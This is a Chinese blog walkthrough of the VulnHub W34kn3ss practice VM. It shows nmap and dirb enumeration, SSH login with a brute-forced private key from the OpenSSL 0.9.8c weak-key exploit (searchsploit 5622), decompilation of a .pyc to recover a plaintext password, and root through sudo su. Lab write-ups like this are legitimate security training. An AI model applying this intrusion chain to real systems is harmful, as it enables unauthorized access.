W34KN3SS靶场实战【超详细】

最新推荐文章于 2024-09-16 15:03:26 发布
最新推荐文章于 2024-09-16 15:03:26 发布
阅读量447 收藏 9
点赞数 7
分类专栏: vulnhub靶机 文章标签: 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/141141476
版权

下载地址:W34kn3ss: 1 ~ VulnHub

一、主机探测与端口扫描

nmap 192.168.121.0/24

 发现开启了22、80、443端口

nmap 192.168.121.194 -p- -A -sV -Pn

443端口有一个 weakness.jth 域名

 二、目录扫描

dirb http://192.168.121.194/

访问80端口 

 没啥功能点

拼接test路径

 提示需要key

没什么发现,看看443端口得到的域名 weakness.jth,访问不到,绑定一下hosts

然后访问

 兔子尾巴有一个值,可能作为账号或密码使用

再扫描weakness.jth的目录

 拼接访问 private

 发现两个文件,看看是啥

 notes.txt中提示这个 key 由 openssl 0.9.8c-1 生成

kali 用 searchsploit 查一下

searchsploit 0.9.8c-1
searchsploit -m 5622

查看 5622.txt,给出了 url,需要下载 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2  

三、get shell

下载后解压

tar vxjf 5622.tar.bz2

匹配 mykey.pub 内容

得到公钥

4161de56829de2fe64b9055711f531c1-2537.pub

进入对应目录,公钥连接ssh,连接成功

cd rsa/2048

ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.121.194

 

 连接成功

四、提权

查看当前目录

 发现一个user.txt和可执行文件code

查看user.txt内容与code类型

cat user.txt
file code

 

code是一个python文件

把文件 copy 到网站根目录,开启一个临时 web 服务,下载下来

cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.23.188:8000/code

 

使用 uncompyle6下载命令 

pip install uncompyle6

修改 code 名为 code.pyc,使用 uncompyle6 反编译,得到密码

mv code code.pyc
uncompyle6 code.pyc

 

n30:dMASDNB!!#B!#!#33

直接sudo su提权试试

提权成功

 

橙子iiii
关注
专栏目录
靶机W34KN3SS练习报告1
08-08
"靶机W34KN3SS练习报告1"提供了一个详细的过程,展示了如何逐步攻破一个虚拟靶机,并最终获取root权限。以下是这个过程中的关键知识点: 1. **虚拟机导入与启动**:靶机是以.ova格式提供的,可以使用VirtualBox或...
mA8LyJnrKbytbUDZhUE32I6w34q.txt
08-25
mA8LyJnrKbytbUDZhUE32I6w34q.txt
vulnhub W34kn3ss: 1
箭雨镜屋
07-31 717
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- 修改hosts文件,并扫描网站目录 ---- 利用OpenSSL 0.9.8c-1可预测伪随机数漏洞爆破ssh私钥 ---- uncompyle6反编译.pyc ---- sudo su提权
W34KN3SS靶场复现【附代码】(权限提升)
weixin_52487093的博客
08-10 872
W34KN3SS靶场复现【附代码】(权限提升) #python 2.7 byte-compiled文件反编译 #uncompyle6的使用
W34KN3SS靶机
weixin_74232792的博客
08-05 636
python2 5720.py ./rsa/2048 192.168.101.93 n30 22 其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。notes.txt有提示,openssl的版本,mykey有一个公钥。放到kali上解压,解压完会生成一个rsa文件夹。kali也绑定该域名,再次目录扫描,发现新东西。端口目录扫描,有一个域名。
W34KN3SS靶机渗透测试
weixin_58786230的博客
08-11 342
【代码】W34KN3SS靶机渗透测试。
Vulnhub靶机 W34KN3SS
菜浪马废的博客
04-29 374
应该没配置域名
W34KN3SS
weixin_52953960的博客
08-07 237
其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。修改hosts文件,绑定域名weakness.jth,然后访问该域名,发现 -n30,和upload.php页面的title一样。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。在notes.txt中有提示,给出openssl的版本,mykey有一个公钥。kali绑定该域名,再次进行目录扫描,发现新东西。在kali上搜索相关漏洞。
W34kn3ss 1靶机
hqy250019的博客
08-11 727
当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。
红队打靶练习:W34KN3SS: 1
分享
01-20 464
红队打靶练习:W34KN3SS: 1。emm,都是见过的openssl密码碰撞+python反编译,没啥难的!
W34KN3SS靶机复现
weixin_52956666的博客
08-12 422
检查文件代码时,发现了一个python的编译文件,进行下载查看。因为知道了openssl的版本,去msf中寻找对应的exp。hosts文件中 绑定ip和weakness.jth。在kali中也绑定host,方便后续使用。发现需要很多密钥,在host文件中绑定。ls查看文件发现有一个user.txt。设置为nat网卡模式,查看mac地址。发现是加密的ssh公钥,尝试解密失败。发现5622.txt适合,下载下来。试图上传一个木马,发现不行。发现openssl的版本。再次查看发现有任何权限。
SICK W34紧凑型光电开关 选型册.rar
10-13
W34系列的外形尺寸图详细展示了开关的物理尺寸,这对于安装位置的规划和空间限制的考虑至关重要。小巧的体积使得它能在狭小的空间内轻松集成,同时保持了足够的检测范围,确保了在不同工作场景下的适应性。 三、...
W34紧凑型光电传感器选型手册(中文版).zip
09-13
《W34紧凑型光电传感器选型手册》是为工程师们提供的一款详尽的参考资料,旨在帮助用户在设计和实施工业自动化项目时选择合适的光电传感器。这款传感器因其紧凑的尺寸和高效性能而在众多领域得到广泛应用,包括物流...
4.网络编程
weixin_45476535的博客
09-14 464
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
centos下nvme over rdma 环境配置
一名运维开发工程师的日常记录
09-13 487
RDMA(全称:Remote Direct Memory Access)是一种远程直接内存访问技术,通过在硬件中实现传输层协议,将内存/消息原语接口暴露至用户空间,通过绕过CPU和内核网络协议栈来实现高吞吐和低延迟的网络。RoCE(RDMA over Converged Ethernet)是一种允许通过以太网使用远程直接内存访问(RDMA)的网络协议。关于什么是NVMe over Fabrics,什么是NVMe over RDMA,本文就不做介绍了,网上资料一大堆。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 188
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
【C++】【网络】【Linux系统编程】单例模式,加锁封装TCP/IP协议套接字
最新发布
2301_79796701的博客
09-16 967
给系统,表明这个套接字所期望的、还未处理的(即还在等待被接受的连接)连接请求的最大队列长度。换句话说,它告诉系统内核为这个套接字分配多大的空间来存储尚未处理的连接请求。有关套接字编程的细节和更多的系统调用课参考《UNIX环境高级编程》一书,可以在如下网站搜索电子版,该书在第16章详细的介绍了各种接口。我们可以根据自己的需求,用面向对象的思想封装出接口简洁的类。在类似添加一个该类类型的指针,该指针是静态的并且是私有成员。结构体填充,为了使不同的地址格式能和套接字绑定,需要把对应的结构体强转成通用地址结构。
【计算机网络 - 基础问题】每日 3 题(七)
Newin2020的博客
09-16 861
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
R语言代码编写 提取大写字母后的数字 df<-tibble(x=c("12W34", "AB2C46", "B217C","akTs6df","21WD4"))
06-07
df (x = c("12W34", "AB2C46", "B217C", "akTs6df", "21WD4")) df$number ("^.*[A-Z](\\d+).*", "\\1", df$x) ``` 解释一下代码: 1. 首先,我们使用了 `gsub` 函数,它可以帮助我们在一个字符串中查找和替换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值